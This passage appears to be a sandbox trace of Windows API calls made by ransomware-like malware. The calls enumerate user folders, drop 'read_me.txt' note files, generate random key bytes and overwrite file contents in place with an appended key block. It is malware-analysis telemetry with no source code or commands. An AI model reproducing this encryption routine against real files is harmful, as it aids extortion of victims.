HALPmcxz\\Searches\\read_me.txt") returned 54 [0076.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa40 [0076.257] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.257] CloseHandle (hObject=0xa40) returned 1 [0076.257] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cbebc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.257] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.257] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\read_me.txt") returned 54 [0076.257] GetProcessHeap () returned 0x4f10000 [0076.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.257] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 83 [0076.257] GetProcessHeap () returned 0x4f10000 [0076.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b10090 | out: hHeap=0x4f10000) returned 1 [0076.257] GetProcessHeap () returned 0x4f10000 [0076.257] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b10090 [0076.257] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*") returned 42 [0076.257] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cbebc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0076.257] wnsprintfW (in: pszDest=0x8b10090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\read_me.txt") returned 52 [0076.257] GetProcessHeap () returned 0x4f10000 [0076.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b10090 | out: hHeap=0x4f10000) returned 1 [0076.257] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 84 [0076.257] GetProcessHeap () returned 0x4f10000 [0076.257] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8dc10f0 | out: hHeap=0x4f10000) returned 1 [0076.257] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.258] ReadFile (in: hFile=0x7a0, lpBuffer=0x728fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x728fd4c*, lpNumberOfBytesRead=0x728fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.258] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.258] GetProcessHeap () returned 0x4f10000 [0076.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.258] GetProcessHeap () returned 0x4f10000 [0076.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0076.258] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0076.258] GetProcessHeap () returned 0x4f10000 [0076.258] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0076.258] ReadFile (in: hFile=0x7a0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x728fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x728fd08*=0x49a, lpOverlapped=0x0) returned 1 [0076.326] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.326] WriteFile (in: hFile=0x7a0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x728fd44*=0x49a, lpOverlapped=0x0) returned 1 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.326] GetProcessHeap () returned 0x4f10000 [0076.326] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.327] GetProcessHeap () returned 0x4f10000 [0076.327] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f980 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0076.328] GetProcessHeap () returned 0x4f10000 [0076.328] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7cf6bf8 [0076.329] GetProcessHeap () returned 0x4f10000 [0076.329] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f980 | out: hHeap=0x4f10000) returned 1 [0076.329] GetProcessHeap () returned 0x4f10000 [0076.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.329] GetProcessHeap () returned 0x4f10000 [0076.329] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.329] GetProcessHeap () returned 0x4f10000 [0076.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.329] GetProcessHeap () returned 0x4f10000 [0076.329] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.329] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.330] GetProcessHeap () returned 0x4f10000 [0076.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0076.331] GetProcessHeap () returned 0x4f10000 [0076.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0076.331] SetFilePointerEx (in: hFile=0x7a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.331] WriteFile (in: hFile=0x7a0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x728fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.331] WriteFile (in: hFile=0x7a0, lpBuffer=0x728fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x728fd44, lpOverlapped=0x0 | out: lpBuffer=0x728fd48*, lpNumberOfBytesWritten=0x728fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.332] GetProcessHeap () returned 0x4f10000 [0076.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0076.332] GetProcessHeap () returned 0x4f10000 [0076.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0076.332] GetProcessHeap () returned 0x4f10000 [0076.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0076.332] CloseHandle (hObject=0x7a0) returned 1 [0076.332] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 6 Thread: id = 4 os_tid = 0x998 Thread: id = 5 os_tid = 0x99c [0076.348] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.349] ReadFile (in: hFile=0x7b8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.349] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.349] GetProcessHeap () returned 0x4f10000 [0076.349] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0076.349] GetProcessHeap () returned 0x4f10000 [0076.349] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d560a0 [0076.349] SystemFunction036 (in: RandomBuffer=0x7d560a0, RandomBufferLength=0x20 | out: RandomBuffer=0x7d560a0) returned 1 [0076.349] GetProcessHeap () returned 0x4f10000 [0076.349] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0076.349] ReadFile (in: hFile=0x7b8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x493, lpOverlapped=0x0) returned 1 [0076.411] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.411] WriteFile (in: hFile=0x7b8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x493, lpOverlapped=0x0) returned 1 [0076.411] GetProcessHeap () returned 0x4f10000 [0076.411] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0076.411] GetProcessHeap () returned 0x4f10000 [0076.411] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.412] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.412] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0076.413] GetProcessHeap () returned 0x4f10000 [0076.413] 